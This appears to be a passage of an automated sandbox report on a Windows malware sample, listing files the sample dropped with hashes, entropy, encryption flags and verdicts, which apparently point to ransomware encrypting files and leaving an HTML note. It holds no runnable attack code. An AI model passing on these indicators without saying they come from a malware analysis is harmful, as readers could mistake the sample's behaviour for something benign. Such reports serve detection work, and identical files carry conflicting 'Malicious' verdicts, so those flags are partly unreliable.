                                    SHA-512:543A8C0B23E745C60F612F545CAFA2354ACA2DCB728192728D163880762BE6ECD2CD0093E2F0E9A6FE4FF05B160D65F56471D0DA6D5CD64E16C0525B3E8C73A0
                                    Malicious:false
                                    Preview:.B..^(..[....h..A|.....(Y.15...$.#...N._..T.F..#j.C.......U.]q.......`,......"O7.Y......+*V.Sf....e..z....... iN.v.....;f...|,.NTw+......D.O.Z...vT.hc..0..*d0..=..{.GR'El...V...Z....).l&...A.....Q......sx....dX...3|`..@..x./..../.$-9f<...m..P.4...m1....e..ws.tq.Ji.1..=..z.....&.%\..........i...A._.........o/.Q.p...Kk...=Z...IF..`..~#...f..B.......i..M.d.}...a....y..3...tw/O.a.Z.:d.m.Qm.\.E..>)y..>V.@..oH7....bna<..E.Jf.ZJcl..d...W......P:.$....Xa.....?...@..Zq....?.q..#\d......H"c.Y.u<.8.......F?7.e.(..qc..k.m.:...P..#.......l.1.........9|L....4.+......a#...l...+....o..R..Y.zh.y&....<a..f.RT....-ku..t.A.i..*.&&:...rN..G.e.......s.'{.s....!....TQn.Q0....7..}.i....)$...R.G...H/ ..*O].B..'xS.3?b........h{....3.Y..(.i...h.Iuq...v..&....&.]..YL{..R x.c.T.[.SMlM&.v?....Q.b.y.:..`..'...A...Q...L..p_..O...q9...t.........8./v.......;.dS...&n....9SG.so.M....m.:..12..y..g..T...]%m@2).u..eV.....Z...........4G.T$C....x..0.v.5.y.&....,.,..w..V..%.
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):1278488
                                    Entropy (8bit):7.999835151084896
                                    Encrypted:true
                                    SSDEEP:24576:oBHiRycWCahcWeCoejQVuvvclYSzfZHLtekIcTmIJrEZAo5W1RmjXf:oB8ahcWeCXjklVZHLo6EZAo5X
                                    MD5:6A8808C992ED1D6DA1EAF2CD32DB90EE
                                    SHA1:9C3A2603239AC9DA9AAB158D72A7DB895E0E05EF
                                    SHA-256:01203FDC2B66A058AFBB18349326AFCFFD2CF93976433B367383939B4145F62C
                                    SHA-512:7DBD38C02750EBEFACDE396E91C3E01794E8F750C8B7253720990D731172706A02F192E2BFEABAEA80FBBBD73AF17369C1896B8902302155E8634F3B8E3ABC69
                                    Malicious:true
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):1262104
                                    Entropy (8bit):7.99984657105943
                                    Encrypted:true
                                    SSDEEP:24576:Rgr7Kh/L4XEol22Ts7ybnHP2Y6Ry8gg2zhVHhMhYq+ZxLOjCq5q1/Y9V6JjYZGtc:yielXsenHPKY8gdzDHogLOjz5q1/YTeQ
                                    MD5:D600D0E6068CC05EFD4FA88558C49893
                                    SHA1:1DF94612451C1DA566EFA574F53B859E7B3F23C2
                                    SHA-256:7DD67B417A016B74EA67866CC8848EDB21F2867756FC701A1666D450953C680D
                                    SHA-512:E3C71BE14FF2975610EA3F6D9D0E56F057B109F039B677985703552BD61ECA6629D17BD4526798BF805BDDEA52200449A1837C0F4519402492F04902DB6BBD3B
                                    Malicious:true
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):82456
                                    Entropy (8bit):7.997876790440874
                                    Encrypted:true
                                    SSDEEP:1536:TaxeNIkB894zcCi32na49orAsjxLqDXgVNECuI0WgS8BQKV:00cBmnCrAcLqDwVNPv0y6
                                    MD5:6505327C72B7D67BF353BC92DCB6E57C
                                    SHA1:C52BD09E2CC6B3FFFCC5AFC8224204429677B4D1
                                    SHA-256:327C38636B3F2AA1239AB4E8FB6687C91A37C7E8C915CADC2EA1D91AFF1B0AC4
                                    SHA-512:4B59FF73CF9A998BE5F0B74FDDDB94E0F6524A1354150EC130677955B39064CD9ABA121499171C095CF09657FCBD5ACEF85DBC1DBAEDC0EFA6E7B0861E629F93
                                    Malicious:true
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):82456
                                    Entropy (8bit):7.9975219340305745
                                    Encrypted:true
                                    SSDEEP:1536:R85+oXQU4OvhaM4pFyRSAXbqWmvJApc59qpNskdt46JHTyw8i0bnuqvdueNTUBHW:Sx3aSRSzWmvqpGApZt46JHTZfEdvkH+n
                                    MD5:9A5933D536D7725F5130CE760B1EA4E7
                                    SHA1:82B2CF4AE8E317CBE27146C5E4CFD7A34D01D7D5
                                    SHA-256:FC882D55F343900197BF9179B82864BD0A4C5F44B58780340BE72E48D80C828F
                                    SHA-512:36AB179FE39F7D7DD1790F175ECF78A49F4C78EACC2B8E86D813C6A21A79B90F7C9F9C7E5CE2F1A053E02628D61468E35B21D4EEA9EA967009E194D5E2D791FD
                                    Malicious:true
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:HTML document, ASCII text, with very long lines (1135)
                                    Category:dropped
                                    Size (bytes):5047
                                    Entropy (8bit):5.370534626181164
                                    Encrypted:false
                                    SSDEEP:96:8y+cAl5azrn+DtZoglItUMF6B+VSZiKFe8LDmeRj+:8OAl0zaDjqtUBKS0KYQDmJ
                                    MD5:745B48668275602A4548365AD585BDD5
                                    SHA1:9475B28C05AD4073C701B518750B782067E8B763
                                    SHA-256:337CD3DBA1ACE4DC908CD528A4FE238CFF34ED5DF0D2D694165753CECD894920
                                    SHA-512:361969A8F4DADA46BD78807B5D4149D6CA609505409EA2E00A4E0B30DABDAAA6984EA8BB89916EA5B78EA327E7DA25E024F6235298C1074D38304BED24E39F87
                                    Malicious:true
                                    Preview:<html>. <style type="text/css">.. body {. background-color: #f5f5f5;. }..h1, h3{. text-align: center;. text-transform: uppercase;. font-weight: normal;.}.../*---*/..tabs1{. display: block;. margin: auto;.}..tabs1 .head{. text-align: center;. float: top;. padding: 0px;. text-transform: uppercase;. font-weight: normal;. display: block;. background: #81bef7;. color: #DF0101;. font-size: 30px;.}...tabs1 .identi {. font-size: 10px;. text-align: center;. float: top;. padding: 15px;. display: block;. background: #81bef7;. color: #DFDFDF;. word-break: break-all;.}....tabs .content {. background: #f5f5f5;. /*text-align: center;*/. color: #000000;. padding: 25px 15px;. font-size: 15px;. font-weight: 400;. line-height: 20px; }. .tabs .content a {. color: #df0130;. font-size: 23px;. font-style: italic;. text-decoration: none;. line-height: 35px; }....tabs .content .text{.padding: 25px;.line-height
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):49688
                                    Entropy (8bit):7.996397772671244
                                    Encrypted:true
                                    SSDEEP:768:7VqH+FMMWQqmTaQDq2IbxP2SsH941D7+pe7pPCKoEsUHgR1oCkLwATxsJAl8jQ:7VqxIVq2QPPKpeFtbgVkEsxsJvQ
                                    MD5:496851E723A776AF94BC98563BD346FB
                                    SHA1:BD61BE1C792DDBA609E7FCDE614B4FB1EDB286C7
                                    SHA-256:39842674385EB5B6951B1AB5A08FDD965F9AF2FE6EC2F6733925C03F362DE8FA
                                    SHA-512:E8ED84689C0256621CF570BDFD7CBE38C0B67FF88C4309703D2627FB1FB30D5AA12CF27E390E29166D1D1B85EE892DE007371DFF127D6B2086782735F7B18F72
                                    Malicious:true
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):82456
                                    Entropy (8bit):7.997912558646714
                                    Encrypted:true
                                    SSDEEP:1536:oUnw2IH85OpnNeT6Mhi5FxHvrjLd60Lc/mR4cGf3Eh1zrwL76GJ4eZW9WEq8fvp:oUn08MpNs6MM7VP531q/SF1XM2
                                    MD5:6CB96AF1730E254EDC4AADFD02A3A624
                                    SHA1:DB5A4121C4C0265693F5D52DF141A4AA468462B6
                                    SHA-256:E7DF15F2809F3165DF9590922E29AA94F2F655F63D3B2330D894675C45F40E32
                                    SHA-512:441C335E53AF653F9F4EF36FBB5005387317FC08A408342CB8F5DB8F8959B0C5997FA691EA9FAF86FD4FC981BAD5514DB6453E5F7B285F990395A91FE4CED517
                                    Malicious:true
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):82456
                                    Entropy (8bit):7.997696431355067
                                    Encrypted:true
                                    SSDEEP:1536:PIzKGIUnYfrW/3UDTR/GALyY0L3WszfUeZfTgrNwFix84RZ2on22:PGfIjHT1GALOWszfUe5Acq8qRn22
                                    MD5:79D752710950DD9ED891028EEE5CBEEA
                                    SHA1:8D3EFAEFC80436E05C75E50183797E7CD415A403
                                    SHA-256:A0F97EFBDB2EEE752AF45A50721CA0975F82B1EDA11444FA2F7E18E874AF0858
                                    SHA-512:D386A225871F1F7CC57EE884580535F0186F8ADCB7BC3DB7D23956BEA3E68C1D40EE13F0B3D9B2829AC7EC49ECC75170617AAA4E888961FCC961ECEBA243BD74
                                    Malicious:true
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:HTML document, ASCII text, with very long lines (1135)
                                    Category:dropped
                                    Size (bytes):5047
                                    Entropy (8bit):5.370534626181164
                                    Encrypted:false
                                    SSDEEP:96:8y+cAl5azrn+DtZoglItUMF6B+VSZiKFe8LDmeRj+:8OAl0zaDjqtUBKS0KYQDmJ
                                    MD5:745B48668275602A4548365AD585BDD5
                                    SHA1:9475B28C05AD4073C701B518750B782067E8B763
                                    SHA-256:337CD3DBA1ACE4DC908CD528A4FE238CFF34ED5DF0D2D694165753CECD894920
                                    SHA-512:361969A8F4DADA46BD78807B5D4149D6CA609505409EA2E00A4E0B30DABDAAA6984EA8BB89916EA5B78EA327E7DA25E024F6235298C1074D38304BED24E39F87
                                    Malicious:true
                                    Preview:<html>. <style type="text/css">.. body {. background-color: #f5f5f5;. }..h1, h3{. text-align: center;. text-transform: uppercase;. font-weight: normal;.}.../*---*/..tabs1{. display: block;. margin: auto;.}..tabs1 .head{. text-align: center;. float: top;. padding: 0px;. text-transform: uppercase;. font-weight: normal;. display: block;. background: #81bef7;. color: #DF0101;. font-size: 30px;.}...tabs1 .identi {. font-size: 10px;. text-align: center;. float: top;. padding: 15px;. display: block;. background: #81bef7;. color: #DFDFDF;. word-break: break-all;.}....tabs .content {. background: #f5f5f5;. /*text-align: center;*/. color: #000000;. padding: 25px 15px;. font-size: 15px;. font-weight: 400;. line-height: 20px; }. .tabs .content a {. color: #df0130;. font-size: 23px;. font-style: italic;. text-decoration: none;. line-height: 35px; }....tabs .content .text{.padding: 25px;.line-height
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):49688
                                    Entropy (8bit):7.996178586060663
                                    Encrypted:true
                                    SSDEEP:768:C+qE5SDaesvbCEGiThLC8FMyxayEIgrEULoEJyQ5b9p6DyDXLQ1eTX7XW6yOH/hs:Cae6Thm8MDIgrEVEcgb9geLTLVznCfX
                                    MD5:CADF34548F20A0F3D9891D55BFE4A9BC
                                    SHA1:D99BE55438D04BF89CED02C67BCA3DE3EF89C2A9
                                    SHA-256:7D53490F5265BF1996924D59401A069F0F8ECDFAE10ADAF9F5A5D20E7D577456
                                    SHA-512:DAED53C25B3A8306B4180BF48A0EAFBF7F352440E21D2B4B9A6B270AD96E2EEFE4F1E28E90802839AD8BA83E966083306473D7FA35AF0E756A75130EF6086F17
                                    Malicious:true
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):82456
                                    Entropy (8bit):7.998205419992001
                                    Encrypted:true
                                    SSDEEP:1536:dI6fi5OadHXDwx7zoB1eYRNfLaLnW1R8FQXVSHZQZm9Lo9daGekOrMjhxAmJYhl5:dVKMaHzRB1eYR8r9+VSHo9dTxOahHJYZ
                                    MD5:65CFC587ED38CFF0305427CCA99479FB
                                    SHA1:573701A66FF6B76390EBFB6DBB622EA48F3F6313
                                    SHA-256:4B5F5F67C3926BC9FACD5F49515382D007FFDBB19458BAF38E36D1A934847DA9
                                    SHA-512:CE93FF34A8C3D53F1100FF2EC8302147C1F1FA22C2504A8196D198CD582991A07FC62A55EF3ECCBFCD14D7179EE967FB95564497CE58C39CD6F88C1BC6141B8D
                                    Malicious:true
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):82456
                                    Entropy (8bit):7.997618400259809
                                    Encrypted:true
                                    SSDEEP:1536:vPOZmhIEy39lfsZogbX1fFVLQ58fbtK/r8JBSn+qZflTI6+tIqLDLmT5co+V/uLy:3eGIEcD02GX1lzo82plNzT5co+d2y
                                    MD5:A0C8D45C64147AD8F5D271297D933566
                                    SHA1:254A17AE38F420F7983A128CA6C417B5C8FEDEFD
                                    SHA-256:FF25DB5B3EE3A5C2281AB85A88F530C24DF73182CFA5713AF09B202559B8ED2D
                                    SHA-512:2F414E2BB9FC507F28AF2D3306913992D6DEFF5399073BDD55A7D1E417128A5ABE0342637BC10F858FD2FC21C43E450773DEE7BE73277D2E4F4485BBA175A922
                                    Malicious:true
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:HTML document, ASCII text, with very long lines (1135)
                                    Category:dropped
                                    Size (bytes):5047
                                    Entropy (8bit):5.370534626181164
                                    Encrypted:false
                                    SSDEEP:96:8y+cAl5azrn+DtZoglItUMF6B+VSZiKFe8LDmeRj+:8OAl0zaDjqtUBKS0KYQDmJ
                                    MD5:745B48668275602A4548365AD585BDD5
                                    SHA1:9475B28C05AD4073C701B518750B782067E8B763
                                    SHA-256:337CD3DBA1ACE4DC908CD528A4FE238CFF34ED5DF0D2D694165753CECD894920
                                    SHA-512:361969A8F4DADA46BD78807B5D4149D6CA609505409EA2E00A4E0B30DABDAAA6984EA8BB89916EA5B78EA327E7DA25E024F6235298C1074D38304BED24E39F87
                                    Malicious:true
                                    Preview:<html>. <style type="text/css">.. body {. background-color: #f5f5f5;. }..h1, h3{. text-align: center;. text-transform: uppercase;. font-weight: normal;.}.../*---*/..tabs1{. display: block;. margin: auto;.}..tabs1 .head{. text-align: center;. float: top;. padding: 0px;. text-transform: uppercase;. font-weight: normal;. display: block;. background: #81bef7;. color: #DF0101;. font-size: 30px;.}...tabs1 .identi {. font-size: 10px;. text-align: center;. float: top;. padding: 15px;. display: block;. background: #81bef7;. color: #DFDFDF;. word-break: break-all;.}....tabs .content {. background: #f5f5f5;. /*text-align: center;*/. color: #000000;. padding: 25px 15px;. font-size: 15px;. font-weight: 400;. line-height: 20px; }. .tabs .content a {. color: #df0130;. font-size: 23px;. font-style: italic;. text-decoration: none;. line-height: 35px; }....tabs .content .text{.padding: 25px;.line-height
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):49688
                                    Entropy (8bit):7.996494406237935
                                    Encrypted:true
                                    SSDEEP:768:l1Ksz6voufacvtxxcq8rTYvSeetIEZfd18N2aMzYj1I3lisjd4vH:+smfRtxxFShNd1TzyI3QsB0H
                                    MD5:F2C396DF9DE478E729E6C66FC4E5A033
                                    SHA1:9526982D6795DB6EE9F8D29C1B1F121F868A1D9F
                                    SHA-256:45BE2255EC77F5218F1E8E53DB62FF0ED28809F2E43DAC78042C693B4F9D7B4B
                                    SHA-512:10ED7648672A29E0AAE03C15A6FF2F985D9265454DC76772170EC4A8144EDB40702E764BC82A9B924390C97CE7029C9DF54293782EAFB6AFFE2AD8C30C6D0E73
                                    Malicious:true
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):82456
                                    Entropy (8bit):7.997460280988206
                                    Encrypted:true
                                    SSDEEP:1536:l9X9A2v9Nf5UMZQCIus4I415NYkt8fbiIRb0kiT9Zy7yLPbZgQIJEY80GvD3:++NfmkkQI415miEIkgE7eVgQrb0aL
                                    MD5:08908AB6D9CB30C818DEA8D2D4EDA057
                                    SHA1:F1E311644F00369B2BFB662811ECE31B4F6CEAAF
                                    SHA-256:B27E5B95954B6F095382B71074F5FD2BDBE1F181D82B53DF79DEB9F686715974
                                    SHA-512:F46BA8CE507EFAB136B2CDE01AB08D30B6CF04266214B1051983D588FCC8BB1B3E4B1648691C61426D841BD6A7710FC81833F9002D0D25379EA2C0959CC39E52
                                    Malicious:true
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):82456
                                    Entropy (8bit):7.997723125585943
                                    Encrypted:true
                                    SSDEEP:1536:1yfZtxihuYfoXZk+7WPGJewdsEsu1q2metHwyp6OMFPIaKbP6xHDUKD:QBUmHWPGowdsEJUutQGZMFgaKj2HDUKD
                                    MD5:4E4C052CA08069AD3F7216BDC554D467
                                    SHA1:A5F060BB626E8CFA7999C48231F8D7542BE8ACDC
                                    SHA-256:1A0F59E9726A79749B9681ADDFDB7B69E5FA445AD52759391F3322F5FDC3C1D9
                                    SHA-512:E7CC6EB9EC02E7D308B9ECCD2D725DC52D3172BB9594ECE0621DBE932BDE4B56831B4216CB54D42A7CC12A54A29AF8CACE21B85657E19D20066DD21F83AAC431
                                    Malicious:true
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:HTML document, ASCII text, with very long lines (1135)
                                    Category:dropped
                                    Size (bytes):5047
                                    Entropy (8bit):5.370534626181164
                                    Encrypted:false
                                    SSDEEP:96:8y+cAl5azrn+DtZoglItUMF6B+VSZiKFe8LDmeRj+:8OAl0zaDjqtUBKS0KYQDmJ
                                    MD5:745B48668275602A4548365AD585BDD5
                                    SHA1:9475B28C05AD4073C701B518750B782067E8B763
                                    SHA-256:337CD3DBA1ACE4DC908CD528A4FE238CFF34ED5DF0D2D694165753CECD894920
                                    SHA-512:361969A8F4DADA46BD78807B5D4149D6CA609505409EA2E00A4E0B30DABDAAA6984EA8BB89916EA5B78EA327E7DA25E024F6235298C1074D38304BED24E39F87
                                    Malicious:false
                                    Preview:<html>. <style type="text/css">.. body {. background-color: #f5f5f5;. }..h1, h3{. text-align: center;. text-transform: uppercase;. font-weight: normal;.}.../*---*/..tabs1{. display: block;. margin: auto;.}..tabs1 .head{. text-align: center;. float: top;. padding: 0px;. text-transform: uppercase;. font-weight: normal;. display: block;. background: #81bef7;. color: #DF0101;. font-size: 30px;.}...tabs1 .identi {. font-size: 10px;. text-align: center;. float: top;. padding: 15px;. display: block;. background: #81bef7;. color: #DFDFDF;. word-break: break-all;.}....tabs .content {. background: #f5f5f5;. /*text-align: center;*/. color: #000000;. padding: 25px 15px;. font-size: 15px;. font-weight: 400;. line-height: 20px; }. .tabs .content a {. color: #df0130;. font-size: 23px;. font-style: italic;. text-decoration: none;. line-height: 35px; }....tabs .content .text{.padding: 25px;.line-height
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):49688
                                    Entropy (8bit):7.995827959658683
                                    Encrypted:true
                                    SSDEEP:1536:HbUmdHW5qzr9zf3m8FU9FIuk2kdgJNHT36U:baqz5F2FIuDk+jH2U
                                    MD5:04B285DD28D761E09E245EE6217054A5
                                    SHA1:3D1243C6D0EA819676AEB8BBFE17456237611AB0
                                    SHA-256:E9F361121CD01573F390394154D9A56E9EE1E3E2C2C5F6EADEB944AD77AAC9DC
                                    SHA-512:DD3A8B3B4E179BCF6597072F9CBFB9AA848C41657712C5B630AB7E7CBDB0B2839E8A98956E1A10B859B17294D0443D5A00E6EB35F5EE81AC8EBB83B91059DE67
                                    Malicious:true
                                    Preview:..-.._..j_8~....Q.._.S.v6..y.^.x...}T.#q..]4.|!.ORz..'.b%'fgg.f.~i.r.. ..-.r..)K...L.&..n........m.7W?.6.D.y?.+.u.z.9#+...k.Et.-..c*Il.Z3..B.b]:D .M...#..\."x.`6;.W.A...H ..W..\.#;Lf..3Qj...!h.| b.9......iw..Hs..v..9"....;..>.M.s*..E.j.f..P..e].o,}..F..:..6.{.n......V.y..dl..0...Q...\k_.?..vA.tb....'.r.dM..k.D..i....h..c...*.7..8....9..E.z...h...K.#Q.o...3..e.8.I.....>.1./...C@..$..[.y....HF..Ac..)..b..4..l].AN..HIC.ou?..j.`.x.W..........9.3.!.&..c.k.....[L..i46O.)E>...|..........9u...'.H...I.G....d...V.@M.."=.r.k..d..>.L...eyJ.8Sf.../.\~;(......dc.a'.R..).e.....#...y`..y.2uE=..Z*..pPz..L......sSv6...m^.M..=LE...<O.I..w.J.Z../.2.O..?.C...i....].O/^$.^...6.j......P1#...p..............X.*.ko@.5..F#p~...^s#...T7Ga8.H"......mG*G@.`..3JN......B.qR.N!..g..f.<..... .7.&.a.<]..LN...*....Xq...N.......W.I.I.-.x.....3.].O...X..u8..3]:..W.......(..f.ed.../h...E..Z&.ne.D.*....0.....L.M..)..v.u18&3|...a,..]C...~...1_...-.Q..j...K.0;8}._E....H?...k...u.../..
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:HTML document, ASCII text, with very long lines (1135)
                                    Category:dropped
                                    Size (bytes):5047
                                    Entropy (8bit):5.370534626181164
                                    Encrypted:false
                                    SSDEEP:96:8y+cAl5azrn+DtZoglItUMF6B+VSZiKFe8LDmeRj+:8OAl0zaDjqtUBKS0KYQDmJ
                                    MD5:745B48668275602A4548365AD585BDD5
                                    SHA1:9475B28C05AD4073C701B518750B782067E8B763
                                    SHA-256:337CD3DBA1ACE4DC908CD528A4FE238CFF34ED5DF0D2D694165753CECD894920
                                    SHA-512:361969A8F4DADA46BD78807B5D4149D6CA609505409EA2E00A4E0B30DABDAAA6984EA8BB89916EA5B78EA327E7DA25E024F6235298C1074D38304BED24E39F87
                                    Malicious:true
                                    Preview:<html>. <style type="text/css">.. body {. background-color: #f5f5f5;. }..h1, h3{. text-align: center;. text-transform: uppercase;. font-weight: normal;.}.../*---*/..tabs1{. display: block;. margin: auto;.}..tabs1 .head{. text-align: center;. float: top;. padding: 0px;. text-transform: uppercase;. font-weight: normal;. display: block;. background: #81bef7;. color: #DF0101;. font-size: 30px;.}...tabs1 .identi {. font-size: 10px;. text-align: center;. float: top;. padding: 15px;. display: block;. background: #81bef7;. color: #DFDFDF;. word-break: break-all;.}....tabs .content {. background: #f5f5f5;. /*text-align: center;*/. color: #000000;. padding: 25px 15px;. font-size: 15px;. font-weight: 400;. line-height: 20px; }. .tabs .content a {. color: #df0130;. font-size: 23px;. font-style: italic;. text-decoration: none;. line-height: 35px; }....tabs .content .text{.padding: 25px;.line-height
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):991768
                                    Entropy (8bit):7.9998129773584585
                                    Encrypted:true
                                    SSDEEP:24576:uX5m4G1rn8Lxf+qgv16g76I2ViwcquUtdB8ZXIt9oM4vWA/RNwhtA:uJi1rnsAzkwgiwcM+cSlvZ/aW
                                    MD5:DC2B924DFC42C115EB70B13483F60EBC
                                    SHA1:602228E32E3EF8ABFA9DB0DC1F8B8E5E0D5EA1EF
                                    SHA-256:25BF6ED8484F044C1D1D3DD641B58448A9B14A8296863895D83F186A449FB094
                                    SHA-512:C7F666BA5AFCC050861B9A412FA5DD131B6D10603C04F9F9ED9C74392AB75AD347CAD1E640820587EA8EAC697500B31C78880915207B2AA2807BAE8EB130F2A6
                                    Malicious:true
                                    Preview:>|.6......=.......V....W..\{..]....Q..l.....O.......h.....x.F..~]...L.l.....~.O.M......'...l............9h....C...F./qj..v.c.......1....K...J%.e...! qOCY.....6l.....u4....l....]g.._..cA.q.3...S.(.L....CN.@...v..|b..-5dZ_g.(..5.0.(K.s}RX.A.......j..l...i..hf........5...4B QDO....f.D......Bd......Q....."/-.....5#*1.....s....'._.........|...oL......w}|..>VN.P.&a.o<.:..cS{..R.x........'[.P....:...+...............#G.a...{...=.....`.kI.\...._.O.Xk.X....H&.e....)....M....~......j...+...).I.y..3...W^......3.j..=......w.L...p..~a...!.Z...{...f//..K;.....y..,...y"..|.@p1....xS]......$.Mx.e.ea..v:[@|....X..f....|.!..A.*..*.;....WB1........[.{<..E^.s...:........*..BM..O.^;B....|...7...63.zb...`.....}.H.^...K..a..u...L}8.....V.(c.......D...$.e...s.;f..b.$.3K:..!.0'7..*. .U....s.|. ....pi.q.8.eAB..~.rI....]..c..l[..w..F.v..G..e1...yv..`/....)S.5..J,..M/.H.H..}......2..*w...d.B6DJ..A....u...(.b$5QC{.@..I..HJ.GC..[....!..ncD.u8.A.~...(.?_.".a
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:HTML document, ASCII text, with very long lines (1135)
                                    Category:dropped
                                    Size (bytes):5047
                                    Entropy (8bit):5.370534626181164
                                    Encrypted:false
                                    SSDEEP:96:8y+cAl5azrn+DtZoglItUMF6B+VSZiKFe8LDmeRj+:8OAl0zaDjqtUBKS0KYQDmJ
                                    MD5:745B48668275602A4548365AD585BDD5
                                    SHA1:9475B28C05AD4073C701B518750B782067E8B763
                                    SHA-256:337CD3DBA1ACE4DC908CD528A4FE238CFF34ED5DF0D2D694165753CECD894920
                                    SHA-512:361969A8F4DADA46BD78807B5D4149D6CA609505409EA2E00A4E0B30DABDAAA6984EA8BB89916EA5B78EA327E7DA25E024F6235298C1074D38304BED24E39F87
                                    Malicious:true
                                    Preview:<html>. <style type="text/css">.. body {. background-color: #f5f5f5;. }..h1, h3{. text-align: center;. text-transform: uppercase;. font-weight: normal;.}.../*---*/..tabs1{. display: block;. margin: auto;.}..tabs1 .head{. text-align: center;. float: top;. padding: 0px;. text-transform: uppercase;. font-weight: normal;. display: block;. background: #81bef7;. color: #DF0101;. font-size: 30px;.}...tabs1 .identi {. font-size: 10px;. text-align: center;. float: top;. padding: 15px;. display: block;. background: #81bef7;. color: #DFDFDF;. word-break: break-all;.}....tabs .content {. background: #f5f5f5;. /*text-align: center;*/. color: #000000;. padding: 25px 15px;. font-size: 15px;. font-weight: 400;. line-height: 20px; }. .tabs .content a {. color: #df0130;. font-size: 23px;. font-style: italic;. text-decoration: none;. line-height: 35px; }....tabs .content .text{.padding: 25px;.line-height
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):16920
                                    Entropy (8bit):7.988589241739158
                                    Encrypted:false
                                    SSDEEP:384:12XWbvM2KjMYgIpTdZ/i9uB002Qyl1HpDwJqWgbWCHoc8VsJ2I/BY:1GOvM2bYgiTd1iEHyF0JqWgbWCIc8Vsy
                                    MD5:BBE2F027562F3D8783AD89517CA24D5F
                                    SHA1:C6ACEEBB743B2C442804EC108BC7245A09C347F1
                                    SHA-256:4019B9B7FD1D3F9A06BE7466D5D13122942FBAAA30094BC4D93A96B6EB05CFD8
                                    SHA-512:F10C5822448080421BBC897F081665F070FE975B45298EBF7A95861B6D255F90356431B2E6DB20AFF9EAD0CB4416970193C2C3224026FDFD5162DD9112CB6928
                                    Malicious:false
                                    Preview:>|.6......=.......V....W..\{..].\....e\:9sr.X..uH......a...,.....`'umh..@iRS]./..7....r..m..`.(J.-.4.=r... ...t.=.`|'.P.-...w...|{...:...t,...w.!..5..y..H.]PN.'...cfi...!.a..1....W.X....V......7...b.S............. .....N;"....TT...i....L"...e..t...u..d...&MHyX.....av./..k.]......../...\...!\.Nj..BwA....~.,.|....E....~%.G7).q...#..+.L.u7.Q.[..o.....P...PQ....b..<}c.%.....2e..t.j.> ..t.....x1..B.>2..V..s..L....m..........d...E.@2q.{.v-*.i....r.P....vc*.0....iV....:Qx(.,.......n.....Eh.Q.^M.*...'..0...........l.aKf.Ha..K..)...>.....$s.r..F_(.o..d.d!{..b(.....q..4...l...,.Vx..Un......Jh...}/.}.C.Hh}4..nh.l.J.'..........z..a...&8.Fo..+X/...Xi...u ....K....-.......}d?T7W~.\.",...m.....VA...K.5'Qz#%..=b....C.z..Zu...W.GS$.7.;w.T.Z..Ew....2...!w..,f...:.|h.#V.kb.j=.ty...Px.)..}...K:].}Z;..o:$QJ......8 .v{.^?!.q.k.lc.X...))...Yk. lU .%!....{....{..>qL..8..#....n'..p...^..%G..%.#@u(Y.....m..w..k^...#c0Q.qDT....|@...d....I(@.{...1.|........-7C.
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:HTML document, ASCII text, with very long lines (1135)
                                    Category:dropped
                                    Size (bytes):5047
                                    Entropy (8bit):5.370534626181164
                                    Encrypted:false
                                    SSDEEP:96:8y+cAl5azrn+DtZoglItUMF6B+VSZiKFe8LDmeRj+:8OAl0zaDjqtUBKS0KYQDmJ
                                    MD5:745B48668275602A4548365AD585BDD5
                                    SHA1:9475B28C05AD4073C701B518750B782067E8B763
                                    SHA-256:337CD3DBA1ACE4DC908CD528A4FE238CFF34ED5DF0D2D694165753CECD894920
                                    SHA-512:361969A8F4DADA46BD78807B5D4149D6CA609505409EA2E00A4E0B30DABDAAA6984EA8BB89916EA5B78EA327E7DA25E024F6235298C1074D38304BED24E39F87
                                    Malicious:true
